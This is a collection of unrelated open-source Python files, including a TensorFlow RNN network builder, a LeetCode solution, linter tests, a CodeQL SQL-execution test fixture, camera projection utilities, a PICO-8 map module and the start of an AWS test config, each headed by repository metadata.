{'name': 'r_conv', 'size': 64, 'act': 'relu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'r_conv', 'size': 32, 'act': 'relu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'r_conv', 'size': 1, 'act': '*', 'stride': [2, 2], 'kernel': (4, 4), 'ln': False},
{'name': 'reshape', 'shape': -1}
]})
net.add_named_config('flying_shapes', {
'input': [
{'name': 'reshape', 'shape': (28, 28, 1)},
{'name': 'conv', 'size': 32, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'conv', 'size': 64, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'reshape', 'shape': -1},
{'name': 'fc', 'size': 512, 'act': 'elu', 'ln': True},
],
'recurrent': [
{'name': 'rnn', 'size': 100, 'act': 'sigmoid', 'ln': True}
],
'output': [
{'name': 'fc', 'size': 512, 'act': 'relu', 'ln': True},
{'name': 'fc', 'size': 7*7*64, 'act': 'relu', 'ln': True},
{'name': 'reshape', 'shape': (7, 7, 64)},
{'name': 'r_conv', 'size': 32, 'act': 'relu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'r_conv', 'size': 1, 'act': '*', 'stride': [2, 2], 'kernel': (4, 4), 'ln': False},
{'name': 'reshape', 'shape': -1},
]})
net.add_named_config('shapes', {
'input': [],
'recurrent': [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': False}
],
'output': [
{'name': 'fc', 'size': 784, 'act': '*', 'ln': False}
]})
net.add_named_config('NEM', {
'use_NEM_formulation': True,
'input': [],
'recurrent': [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': False}
],
'output': [
{'name': 'fc', 'size': 784, 'act': 'sigmoid', 'ln': False}
]})
# GENERIC WRAPPERS
class InputWrapper(RNNCell):
"""Adding an input projection to the given cell."""
def __init__(self, cell, spec, name="InputWrapper"):
self._cell = cell
self._spec = spec
self._name = name
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
projected = None
with tf.variable_scope(scope or self._name):
if self._spec['name'] == 'fc':
projected = slim.fully_connected(inputs, self._spec['size'], activation_fn=None)
elif self._spec['name'] == 'conv':
projected = slim.conv2d(inputs, self._spec['size'], self._spec['kernel'], self._spec['stride'], activation_fn=None)
else:
raise ValueError('Unknown layer name "{}"'.format(self._spec['name']))
return self._cell(projected, state)
class OutputWrapper(RNNCell):
def __init__(self, cell, spec, n_out=1, name="OutputWrapper"):
self._cell = cell
self._spec = spec
self._name = name
self._n_out = n_out
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._spec['size']
def __call__(self, inputs, state, scope=None):
output, res_state = self._cell(inputs, state)
projected = None
with tf.variable_scope((scope or self._name)):
if self._spec['name'] == 'fc':
projected = slim.fully_connected(output, self._spec['size'], activation_fn=None)
elif self._spec['name'] == 't_conv':
projected = slim.layers.conv2d_transpose(output, self._spec['size'], self._spec['kernel'], self._spec['stride'], activation_fn=None)
elif self._spec['name'] == 'r_conv':
resized = tf.image.resize_images(output, (self._spec['stride'][0] * output.get_shape()[1].value,
self._spec['stride'][1] * output.get_shape()[2].value), method=1)
projected = slim.layers.conv2d(resized, self._spec['size'], self._spec['kernel'], activation_fn=None)
else:
raise ValueError('Unknown layer name "{}"'.format(self._spec['name']))
return projected, res_state
class ReshapeWrapper(RNNCell):
def __init__(self, cell, shape='flatten', apply_to='output'):
self._cell = cell
self._shape = shape
self._apply_to = apply_to
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
batch_size = tf.shape(inputs)[0]
if self._apply_to == 'input':
inputs = slim.flatten(inputs) if self._shape == -1 else tf.reshape(inputs, [batch_size] + self._shape)
return self._cell(inputs, state)
elif self._apply_to == 'output':
output, res_state = self._cell(inputs, state)
output = slim.flatten(output) if self._shape == -1 else tf.reshape(output, [batch_size] + self._shape)
return output, res_state
elif self._apply_to == 'state':
output, res_state = self._cell(inputs, state)
res_state = slim.flatten(res_state) if self._shape == -1 else tf.reshape(res_state, [batch_size] + self._shape)
return output, res_state
else:
raise ValueError('Unknown apply_to: "{}"'.format(self._apply_to))
class ActivationFunctionWrapper(RNNCell):
def __init__(self, cell, activation='linear', apply_to='output'):
self._cell = cell
self._activation = ACTIVATION_FUNCTIONS[activation]
self._apply_to = apply_to
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
if self._apply_to == 'input':
inputs = self._activation(inputs)
return self._cell(inputs, state)
elif self._apply_to == 'output':
output, res_state = self._cell(inputs, state)
output = self._activation(output)
return output, res_state
elif self._apply_to == 'state':
output, res_state = self._cell(inputs, state)
res_state = self._activation(res_state)
return output, res_state
else:
raise ValueError('Unknown apply_to: "{}"'.format(self._apply_to))
class LayerNormWrapper(RNNCell):
def __init__(self, cell, apply_to='output', name="LayerNorm"):
self._cell = cell
self._name = name
self._apply_to = apply_to
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
if self._apply_to == 'input':
with tf.variable_scope(scope or self._name):
inputs = slim.layer_norm(inputs)
return self._cell(inputs, state)
elif self._apply_to == 'output':
output, res_state = self._cell(inputs, state)
with tf.variable_scope(scope or self._name):
output = slim.layer_norm(output)
return output, res_state
elif self._apply_to == 'state':
output, res_state = self._cell(inputs, state)
with tf.variable_scope(scope or self._name):
res_state = slim.layer_norm(res_state)
return output, res_state
else:
raise ValueError('Unknown apply_to: "{}"'.format(self._apply_to))
class InputNormalizationWrapper(RNNCell):
def __init__(self, cell, name="InputNorm"):
self._cell = cell
self._name = name
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
with tf.variable_scope(scope or self._name):
mean, var = tf.nn.moments(inputs, axes=[1])
inputs = (inputs - tf.expand_dims(mean, axis=1)) / tf.sqrt(tf.expand_dims(var, axis=1))
return self._cell(inputs, state)
# EM CELL (WRAPPERS)
class NEMCell(RNNCell):
def __init__(self, num_units, name="NEMCell"):
self._num_units = num_units
self._name = name
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
with tf.variable_scope(scope or self._name):
with tf.variable_scope(scope or "lr"):
lr = tf.get_variable("scalar", shape=(1, 1), dtype=tf.float32)
# apply z = z' + lr * sigma(z')(1 - sigma(z'))* W^T * x
output = state + lr * tf.sigmoid(state) * (1 - tf.sigmoid(state)) * slim.fully_connected(
inputs, self._num_units, scope='input', activation_fn=None, biases_initializer=None)
return tf.sigmoid(output), output
class NEMOutputWrapper(RNNCell):
def __init__(self, cell, size, weight_path, name="NEMOutputWrapper"):
self._cell = cell
self._size = size
self._weight_path = weight_path
self._name = name
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._size
def __call__(self, inputs, state, scope=None):
output, res_state = self._cell(inputs, state)
with tf.variable_scope("multi_rnn_cell/cell_0/NEMCell/input", reuse=True):
W_t = tf.transpose(tf.get_variable("weights"))
projected = tf.matmul(output, W_t)
return projected, res_state
# NETWORK BUILDER
@net.capture
def build_network(out_size, output_dist, input, recurrent, output, use_NEM_formulation=False):
with tf.name_scope('inner_RNN'):
# use proper mathematical formulation
if use_NEM_formulation:
cell = NEMCell(recurrent[0]['size'])
cell = tf.contrib.rnn.MultiRNNCell([cell])
cell = NEMOutputWrapper(cell, out_size, "multi_rnn_cell/cell_0/EMCell")
cell = ActivationFunctionWrapper(cell, output[0]['act'])
return cell
# build recurrent
cell_list = []
for i, layer in enumerate(recurrent):
if layer['name'] == 'rnn':
cell = tf.contrib.rnn.BasicRNNCell(layer['size'], activation=ACTIVATION_FUNCTIONS['linear'])
cell = LayerNormWrapper(cell, apply_to='output', name='LayerNormR{}'.format(i)) if layer['ln'] else cell
cell = ActivationFunctionWrapper(cell, activation=layer['act'], apply_to='state')
cell = ActivationFunctionWrapper(cell, activation=layer['act'], apply_to='output')
else:
raise ValueError('Unknown recurrent name "{}"'.format(layer['name']))
cell_list.append(cell)
cell = tf.contrib.rnn.MultiRNNCell(cell_list)
# build input
for i, layer in reversed(list(enumerate(input))):
if layer['name'] == 'reshape':
cell = ReshapeWrapper(cell, layer['shape'], apply_to='input')
elif layer['name'] == 'input_norm':
cell = InputNormalizationWrapper(cell, name='InputNormalization')
else:
cell = ActivationFunctionWrapper(cell, layer['act'], apply_to='input')
cell = LayerNormWrapper(cell, apply_to='input', name='LayerNormI{}'.format(i)) if layer['ln'] else cell
cell = InputWrapper(cell, layer, name="InputWrapper{}".format(i))
# build output
for i, layer in enumerate(output):
if layer['name'] == 'reshape':
cell = ReshapeWrapper(cell, layer['shape'])
else:
n_out = layer.get('n_out', 1)
cell = OutputWrapper(cell, layer, n_out=n_out, name="OutputWrapper{}".format(i))
cell = LayerNormWrapper(cell, apply_to='output', name='LayerNormO{}'.format(i)) if layer['ln'] else cell
if layer['act'] == '*':
output_act = 'linear' if output_dist == 'gaussian' else 'sigmoid'
cell = ActivationFunctionWrapper(cell, output_act, apply_to='output')
else:
cell = ActivationFunctionWrapper(cell, layer['act'], apply_to='output')
return cell
|
python/080 Remove Duplicates from Sorted Array II.py
|
allandproust/leetcode-share
| 156 |
69564
|
<gh_stars>100-1000
'''
Follow up for "Remove Duplicates":
What if duplicates are allowed at most twice?
For example,
Given sorted array nums = [1,1,1,2,2,3],
Your function should return length = 5, with the first five elements of nums being 1, 1, 2, 2 and 3. It doesn't matter what you leave beyond the new length.
'''
class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
count = 0
for i in range(len(nums)):
if count < 2 or nums[count - 2] != nums[i]:
nums[count] = nums[i]
count += 1
return count
if __name__ == "__main__":
l = [1, 1, 1, 2, 2, 3]
r = Solution().removeDuplicates(l)
assert l == [1, 1, 2, 2, 3, 3]
assert r == 5
|
tests/test_visitors/test_ast/test_classes/test_getter_setter.py
|
notpushkin/wemake-python-styleguide
| 1,931 |
69576
|
<reponame>notpushkin/wemake-python-styleguide<filename>tests/test_visitors/test_ast/test_classes/test_getter_setter.py<gh_stars>1000+
import pytest
from wemake_python_styleguide.violations.oop import (
UnpythonicGetterSetterViolation,
)
from wemake_python_styleguide.visitors.ast.classes import WrongClassBodyVisitor
module_getter_and_setter = """
attribute = 1
def get_attribute():
...
def set_attribute():
...
"""
static_getter_and_setter = """
attribute = 1
class Test(object):
@staticmethod
def get_attribute():
...
@staticmethod
def set_attribute():
...
"""
paired_getter_and_setter = """
class Test(object):
def get_attribute():
...
def set_attribute():
...
"""
property_getter_and_setter = """
class Test(object):
def __init__(self):
self.attribute = 1
@property
def attribute(self):
...
@attribute.setter
def attribute(self):
...
"""
dataclass_property_getter_setter = """
@dataclass
class DataClass(object):
attribute: int
@property
def attribute(self):
...
@attribute.setter
def attribute(self):
...
"""
dataclass_incorrect_property_getter_setter = """
@dataclass
class DataClass(object):
attribute: int
@property
def get_attribute(self):
...
@attribute.setter
def set_attribute(self):
...
"""
dataclass_getter_setter = """
@dataclass
class DataClass(object):
attribute: int
def get_attribute(self):
...
def set_attribute(self):
...
"""
child_getter_and_setter = """
class TestParent(object):
def __init__(self):
self.attribute = 1
class TestChild(TestParent):
def get_attribute(self):
...
def set_attribute(self):
...
"""
nested_getter_and_setter = """
class Template(object):
def __init__(self):
self.attribute = 1
def some_function(self):
def get_attribute(self):
...
def set_attribute(self):
...
get_attribute(self)
"""
class_getter_and_setter_attributes = """
class Test(object):
attribute = 1
get_attribute = 1
set_attribute = 1
"""
instance_getter_and_setter_attributes = """
class Test(object):
def __init__(self):
self.attribute = 1
self.get_attribute = 1
self.set_attribute = 1
"""
other_getter_and_setter = """
class Test(object):
def __init__(self, other):
other.attr = self.some()
def get_attr(self):
return something.unrelated()
"""
instance_attribute_template = """
class Template(object):
def __init__(self):
self.{0}{1}{2}
{3}
def {4}(self):
...
"""
class_attribute_template = """
class Template(object):
{0}{1}{2}
{3}
def {4}:
...
"""
class_mixed = """
class Test(object):
first: int
second = 2
third: int = 3
def __init__(self):
self.{0}{1} = 5
def get_{2}(self):
...
def set_{3}(self):
...
"""
@pytest.mark.parametrize('code', [
module_getter_and_setter,
nested_getter_and_setter,
property_getter_and_setter,
class_getter_and_setter_attributes,
instance_getter_and_setter_attributes,
dataclass_property_getter_setter,
other_getter_and_setter,
])
def test_valid_getter_and_setter(
assert_errors,
parse_ast_tree,
default_options,
code,
mode,
):
"""Testing that correct usage of getter/setter is allowed."""
tree = parse_ast_tree(mode(code))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('code', [
dataclass_getter_setter,
dataclass_incorrect_property_getter_setter,
static_getter_and_setter,
child_getter_and_setter,
paired_getter_and_setter,
])
def test_invalid_getter_and_setter(
assert_errors,
parse_ast_tree,
default_options,
code,
mode,
):
"""Testing that wrong use of getter/setter is prohibited."""
tree = parse_ast_tree(mode(code))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [
UnpythonicGetterSetterViolation,
UnpythonicGetterSetterViolation,
])
@pytest.mark.parametrize('access', [''])
@pytest.mark.parametrize('assignment', [' = 1'])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '', 'get_attribute_some'),
('attribute', '', 'some_get_attribute'),
('attribute', '', 'get_some_attribute'),
('attribute', '', 'attribute_get'),
('some_attribute', '', 'get_attribute'),
('attribute_some', '', 'get_attribute'),
])
def test_nonmatching_instance(
assert_errors,
parse_ast_tree,
default_options,
access,
assignment,
attribute_name,
annotation,
method_name,
mode,
):
"""Testing that non matching attribute and getter/setter is allowed."""
test_instance = instance_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('access', ['', '_', '__'])
@pytest.mark.parametrize('assignment', [
' = 1',
': int = 1',
' = self.other = 1',
', self.other = 1, 2',
])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '', 'get_attribute'),
('attribute', '', 'set_attribute'),
('attribute_some', '', 'get_attribute_some'),
('some_attribute', '', 'set_some_attribute'),
('attribute', '@classmethod', 'get_attribute'),
('attribute', '@classmethod', 'set_attribute'),
('attribute', '@staticmethod', 'get_attribute'),
('attribute', '@staticmethod', 'set_attribute'),
('attribute', '@property', 'get_attribute'),
('attribute', '@attribute.setter', 'set_attribute'),
])
def test_instance_getter_setter(
assert_errors,
parse_ast_tree,
default_options,
access,
assignment,
attribute_name,
annotation,
method_name,
mode,
):
"""Testing that instance attribute and getter/setter is prohibited."""
test_instance = instance_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [UnpythonicGetterSetterViolation])
@pytest.mark.parametrize('access', [''])
@pytest.mark.parametrize('assignment', [' = 1'])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '@classmethod', 'get_attribute_some(self)'),
('attribute', '@classmethod', 'some_get_attribute(self)'),
('attribute', '@classmethod', 'get_some_attribute(self)'),
('attribute', '@classmethod', 'attribute_get(self)'),
('some_attribute', '@classmethod', 'get_attribute(self)'),
('attribute_some', '@classmethod', 'get_attribute(self)'),
])
def test_nonmatching_class(
assert_errors,
parse_ast_tree,
default_options,
access,
attribute_name,
annotation,
method_name,
assignment,
mode,
):
"""Testing that non matching attribute and getter/setter is allowed."""
test_instance = class_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('access', ['', '_', '__'])
@pytest.mark.parametrize('assignment', [
' = 1',
': int = 1',
': int',
' = other = 1',
', other = 1, 2',
])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '@classmethod', 'get_attribute(cls)'),
('attribute', '@classmethod', 'set_attribute(cls)'),
('attribute_some', '@classmethod', 'get_attribute_some(self)'),
('some_attribute', '@classmethod', 'set_some_attribute(self)'),
('attribute', '', 'get_attribute(cls)'),
('attribute', '', 'set_attribute(cls)'),
('attribute', '@staticmethod', 'get_attribute(cls)'),
('attribute', '@staticmethod', 'set_attribute(cls)'),
])
def test_class_attributes_getter_setter(
assert_errors,
parse_ast_tree,
default_options,
attribute_name,
access,
annotation,
method_name,
assignment,
mode,
):
"""Testing that using getter/setters with class attributes is prohibited."""
test_instance = class_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [UnpythonicGetterSetterViolation])
@pytest.mark.parametrize('access', ['', '_', '__'])
@pytest.mark.parametrize(('first', 'second', 'third'), [
('attribute', 'some', 'other'),
('attribute', 'some', 'another'),
])
def test_class_mixed(
assert_errors,
parse_ast_tree,
default_options,
access,
first,
second,
third,
mode,
):
"""Testing correct use of methods with get/set in name."""
test_instance = class_mixed.format(access, first, second, third)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
|
python/ql/test/library-tests/frameworks/peewee/sql_execution.py
|
madhurimamandal/codeql
| 4,036 |
69584
|
import peewee
import playhouse.pool
# This is just one example of one of the support databases
# see https://docs.peewee-orm.com/en/latest/peewee/database.html
db = peewee.MySQLDatabase()
conn = db.connection()
cursor = conn.cursor()
cursor.execute("sql") # $ getSql="sql"
cursor = db.cursor()
cursor.execute("sql") # $ getSql="sql"
db.execute_sql("sql") # $ getSql="sql"
# Pool extension
pool = playhouse.pool.PooledMySQLDatabase(...)
pool.execute_sql("sql") # $ getSql="sql"
|
lib/renderer/camera.py
|
YuliangXiu/ICON
| 486 |
69588
|
# -*- coding: utf-8 -*-
# Max-Planck-Gesellschaft zur Förderung der Wissenschaften e.V. (MPG) is
# holder of all proprietary rights on this computer program.
# You can only use this computer program if you have closed
# a license agreement with MPG or you get the right to use the computer
# program from someone who is authorized to grant you that right.
# Any use of the computer program without a valid license is prohibited and
# liable to prosecution.
#
# Copyright©2019 Max-Planck-Gesellschaft zur Förderung
# der Wissenschaften e.V. (MPG). acting on behalf of its Max Planck Institute
# for Intelligent Systems. All rights reserved.
#
# Contact: <EMAIL>
import cv2
import numpy as np
from .glm import ortho
class Camera:
def __init__(self, width=1600, height=1200):
# Focal Length
# equivalent 50mm
focal = np.sqrt(width * width + height * height)
self.focal_x = focal
self.focal_y = focal
# Principal Point Offset
self.principal_x = width / 2
self.principal_y = height / 2
# Axis Skew
self.skew = 0
# Image Size
self.width = width
self.height = height
self.near = 1
self.far = 10
# Camera Center
self.center = np.array([0, 0, 1.6])
self.direction = np.array([0, 0, -1])
self.right = np.array([1, 0, 0])
self.up = np.array([0, 1, 0])
self.ortho_ratio = None
def sanity_check(self):
self.center = self.center.reshape([-1])
self.direction = self.direction.reshape([-1])
self.right = self.right.reshape([-1])
self.up = self.up.reshape([-1])
assert len(self.center) == 3
assert len(self.direction) == 3
assert len(self.right) == 3
assert len(self.up) == 3
@staticmethod
def normalize_vector(v):
v_norm = np.linalg.norm(v)
return v if v_norm == 0 else v / v_norm
def get_real_z_value(self, z):
z_near = self.near
z_far = self.far
z_n = 2.0 * z - 1.0
z_e = 2.0 * z_near * z_far / (z_far + z_near - z_n * (z_far - z_near))
return z_e
def get_rotation_matrix(self):
rot_mat = np.eye(3)
s = self.right
s = self.normalize_vector(s)
rot_mat[0, :] = s
u = self.up
u = self.normalize_vector(u)
rot_mat[1, :] = -u
rot_mat[2, :] = self.normalize_vector(self.direction)
return rot_mat
def get_translation_vector(self):
rot_mat = self.get_rotation_matrix()
trans = -np.dot(rot_mat, self.center)
return trans
def get_intrinsic_matrix(self):
int_mat = np.eye(3)
int_mat[0, 0] = self.focal_x
int_mat[1, 1] = self.focal_y
int_mat[0, 1] = self.skew
int_mat[0, 2] = self.principal_x
int_mat[1, 2] = self.principal_y
return int_mat
def get_projection_matrix(self):
ext_mat = self.get_extrinsic_matrix()
int_mat = self.get_intrinsic_matrix()
return np.matmul(int_mat, ext_mat)
def get_extrinsic_matrix(self):
rot_mat = self.get_rotation_matrix()
int_mat = self.get_intrinsic_matrix()
trans = self.get_translation_vector()
extrinsic = np.eye(4)
extrinsic[:3, :3] = rot_mat
extrinsic[:3, 3] = trans
return extrinsic[:3, :]
def set_rotation_matrix(self, rot_mat):
self.direction = rot_mat[2, :]
self.up = -rot_mat[1, :]
self.right = rot_mat[0, :]
def set_intrinsic_matrix(self, int_mat):
self.focal_x = int_mat[0, 0]
self.focal_y = int_mat[1, 1]
self.skew = int_mat[0, 1]
self.principal_x = int_mat[0, 2]
self.principal_y = int_mat[1, 2]
def set_projection_matrix(self, proj_mat):
res = cv2.decomposeProjectionMatrix(proj_mat)
int_mat, rot_mat, camera_center_homo = res[0], res[1], res[2]
camera_center = camera_center_homo[0:3] / camera_center_homo[3]
camera_center = camera_center.reshape(-1)
int_mat = int_mat / int_mat[2][2]
self.set_intrinsic_matrix(int_mat)
self.set_rotation_matrix(rot_mat)
self.center = camera_center
self.sanity_check()
def get_gl_matrix(self):
z_near = self.near
z_far = self.far
rot_mat = self.get_rotation_matrix()
int_mat = self.get_intrinsic_matrix()
trans = self.get_translation_vector()
extrinsic = np.eye(4)
extrinsic[:3, :3] = rot_mat
extrinsic[:3, 3] = trans
axis_adj = np.eye(4)
axis_adj[2, 2] = -1
axis_adj[1, 1] = -1
model_view = np.matmul(axis_adj, extrinsic)
projective = np.zeros([4, 4])
projective[:2, :2] = int_mat[:2, :2]
projective[:2, 2:3] = -int_mat[:2, 2:3]
projective[3, 2] = -1
projective[2, 2] = (z_near + z_far)
projective[2, 3] = (z_near * z_far)
if self.ortho_ratio is None:
ndc = ortho(0, self.width, 0, self.height, z_near, z_far)
perspective = np.matmul(ndc, projective)
else:
perspective = ortho(-self.width * self.ortho_ratio / 2,
self.width * self.ortho_ratio / 2,
-self.height * self.ortho_ratio / 2,
self.height * self.ortho_ratio / 2, z_near,
z_far)
return perspective, model_view
def KRT_from_P(proj_mat, normalize_K=True):
res = cv2.decomposeProjectionMatrix(proj_mat)
K, Rot, camera_center_homog = res[0], res[1], res[2]
camera_center = camera_center_homog[0:3] / camera_center_homog[3]
trans = -Rot.dot(camera_center)
if normalize_K:
K = K / K[2][2]
return K, Rot, trans
def MVP_from_P(proj_mat, width, height, near=0.1, far=10000):
'''
Convert OpenCV camera calibration matrix to OpenGL projection and model view matrix
:param proj_mat: OpenCV camera projeciton matrix
:param width: Image width
:param height: Image height
:param near: Z near value
:param far: Z far value
:return: OpenGL projection matrix and model view matrix
'''
res = cv2.decomposeProjectionMatrix(proj_mat)
K, Rot, camera_center_homog = res[0], res[1], res[2]
camera_center = camera_center_homog[0:3] / camera_center_homog[3]
trans = -Rot.dot(camera_center)
K = K / K[2][2]
extrinsic = np.eye(4)
extrinsic[:3, :3] = Rot
extrinsic[:3, 3:4] = trans
axis_adj = np.eye(4)
axis_adj[2, 2] = -1
axis_adj[1, 1] = -1
model_view = np.matmul(axis_adj, extrinsic)
zFar = far
zNear = near
projective = np.zeros([4, 4])
projective[:2, :2] = K[:2, :2]
projective[:2, 2:3] = -K[:2, 2:3]
projective[3, 2] = -1
projective[2, 2] = (zNear + zFar)
projective[2, 3] = (zNear * zFar)
ndc = ortho(0, width, 0, height, zNear, zFar)
perspective = np.matmul(ndc, projective)
return perspective, model_view
|
pico8/map/map.py
|
lifning/picotool
| 310 |
69610
|
<reponame>lifning/picotool
"""The map section of a PICO-8 cart.
The map region consists of 4096 bytes. The .p8 representation is 32
lines of 256 hexadecimal digits (128 bytes).
The map is 128 tiles wide by 64 tiles high. Each tile is one of the
256 tiles from the spritesheet. Map memory describes the top 32 rows
(128 * 32 = 4096). If the developer draws tiles in the bottom 32 rows,
this is stored in the bottom of the gfx memory region.
"""
__all__ = ['Map']
from .. import util
class Map(util.BaseSection):
"""The map region of a PICO-8 cart."""
HEX_LINE_LENGTH_BYTES = 128
def __init__(self, *args, **kwargs):
"""The initializer.
The Map initializer takes an optional gfx keyword argument
whose value is a reference to the Gfx instance where lower map
data is stored.
"""
self._gfx = None
if 'gfx' in kwargs:
self._gfx = kwargs['gfx']
del kwargs['gfx']
super().__init__(*args, **kwargs)
@classmethod
def empty(cls, version=4, gfx=None):
"""Creates an empty instance.
Args:
version: The PICO-8 file version.
gfx: The Gfx object where lower map data is written.
Returns:
A Map instance.
"""
return cls(data=bytearray(b'\x00' * 4096), version=version, gfx=gfx)
@classmethod
def from_lines(cls, *args, **kwargs):
gfx = None
if 'gfx' in kwargs:
gfx = kwargs['gfx']
del kwargs['gfx']
result = super().from_lines(*args, **kwargs)
result._gfx = gfx
return result
@classmethod
def from_bytes(cls, *args, **kwargs):
gfx = None
if 'gfx' in kwargs:
gfx = kwargs['gfx']
del kwargs['gfx']
result = super().from_bytes(*args, **kwargs)
result._gfx = gfx
return result
def get_cell(self, x, y):
"""Gets the tile ID for a map cell.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. Map must have a Gfx if y > 31.
(0-63)
Returns:
The tile ID for the cell.
"""
assert 0 <= x <= 127
assert (0 <= y <= 31) or ((0 <= y <= 63) and self._gfx is not None)
if y <= 31:
return self._data[y * 128 + x]
return self._gfx._data[4096 + (y - 32) * 128 + x]
def set_cell(self, x, y, val):
"""Sets the tile ID for a map cell.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. (0-63) If y > 31, Map must have a
Gfx, and this method updates the shared data region in the Gfx.
val: The new tile ID for the cell. (0-255)
"""
assert 0 <= x <= 127
assert (0 <= y <= 31) or ((0 <= y <= 63) and self._gfx is not None)
assert 0 <= val <= 255
if y <= 31:
self._data[y * 128 + x] = val
else:
self._gfx._data[4096 + (y - 32) * 128 + x] = val
def get_rect_tiles(self, x, y, width=1, height=1):
"""Gets a rectangle of map tiles.
The map is a grid of 128x32 tiles, or 128x64 if using the
gfx/map shared memory for map data. This method returns a
rectangle of tile IDs on the map, as a list of bytearrays.
If the requested rectangle size goes off the edge of the map,
the off-edge tiles are returned as 0. The bottom edge is
always assumed to be beyond the 64th row in the gfx/map shared
memory region.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map
must have a Gfx.
width: The width of the rectangle, as a number of tiles.
height: The height of the rectangle, as a number of tiles.
Returns:
The rectangle of tile IDs, as a list of bytearrays.
"""
assert 0 <= x <= 127
assert 1 <= width
assert 1 <= height
assert ((0 <= y + height <= 32) or
((0 <= y + height <= 64) and self._gfx is not None))
result = []
for tile_y in range(y, y + height):
row = bytearray()
for tile_x in range(x, x + width):
if (tile_y > 63) or (tile_x > 127):
row.append(0)
else:
row.append(self.get_cell(tile_x, tile_y))
result.append(row)
return result
def set_rect_tiles(self, rect, x, y):
"""Writes a rectangle of tiles to the map.
If writing the given rectangle at the given coordinates causes
the rectangle to extend off the edge of the map, the remainer
is discarded.
Args:
rect: A rectangle of tile IDs, as an iterable of iterables of IDs.
x: The map tile x coordinate (column) of the upper left corner to
start writing.
y: The map tile y coordinate (row) of the upper left corner to
start writing.
"""
for tile_y, row in enumerate(rect):
for tile_x, val in enumerate(row):
if ((tile_y + y) > 127) or ((tile_x + x) > 127):
continue
self.set_cell(tile_x + x, tile_y + y, val)
def get_rect_pixels(self, x, y, width=1, height=1):
"""Gets a rectangel of map tiles as pixels.
This is similar to get_rect_tiles() except the tiles are
extracted from Gfx data and returned as a rectangle of pixels.
Just like PICO-8, tile ID 0 is rendered as empty (all 0's),
not the actual tile at ID 0.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map
must have a Gfx.
width: The width of the rectangle, as a number of tiles.
height: The height of the rectangle, as a number of tiles.
Returns:
The rectangle of pixels, as a list of bytearrays of pixel colors.
"""
assert self._gfx is not None
assert 0 <= x <= 127
assert 1 <= width
assert 1 <= height
assert 0 <= y + height <= 64
tile_rect = self.get_rect_tiles(x, y, width, height)
result = []
for tile_row in tile_rect:
pixel_row = [bytearray(), bytearray(), bytearray(), bytearray(),
bytearray(), bytearray(), bytearray(), bytearray()]
for id in tile_row:
if id == 0:
sprite = [bytearray(b'\x00' * 8)] * 8
else:
sprite = self._gfx.get_sprite(id)
for i in range(0, 8):
pixel_row[i].extend(sprite[i])
for i in range(0, 8):
result.append(pixel_row[i])
return result
|
atlas/aws_utils/src/integration/config.py
|
DeepLearnI/atlas
| 296 |
69628
|
<filename>atlas/aws_utils/src/integration/config.py<gh_stars>100-1000
from uuid import uuid4
# separates test runs
TEST_UUID = str(uuid4())
def _code_bucket():
return 'foundations-code-test'
def make_code_bucket():
from foundations import PrefixedBucket
from foundations_aws import AWSBucket
return PrefixedBucket(TEST_UUID, AWSBucket, _code_bucket())
def _result_bucket():
return 'foundations-results-test'
def make_result_bucket():
from foundations import PrefixedBucket
from foundations_aws import AWSBucket
return PrefixedBucket(TEST_UUID, AWSBucket, _result_bucket())
def _config():
from foundations import config_manager
from foundations import PrefixedBucket, BucketPipelineArchive, BucketPipelineListing
from foundations_aws import AWSBucket
# archive implementations
archive_implementation = {
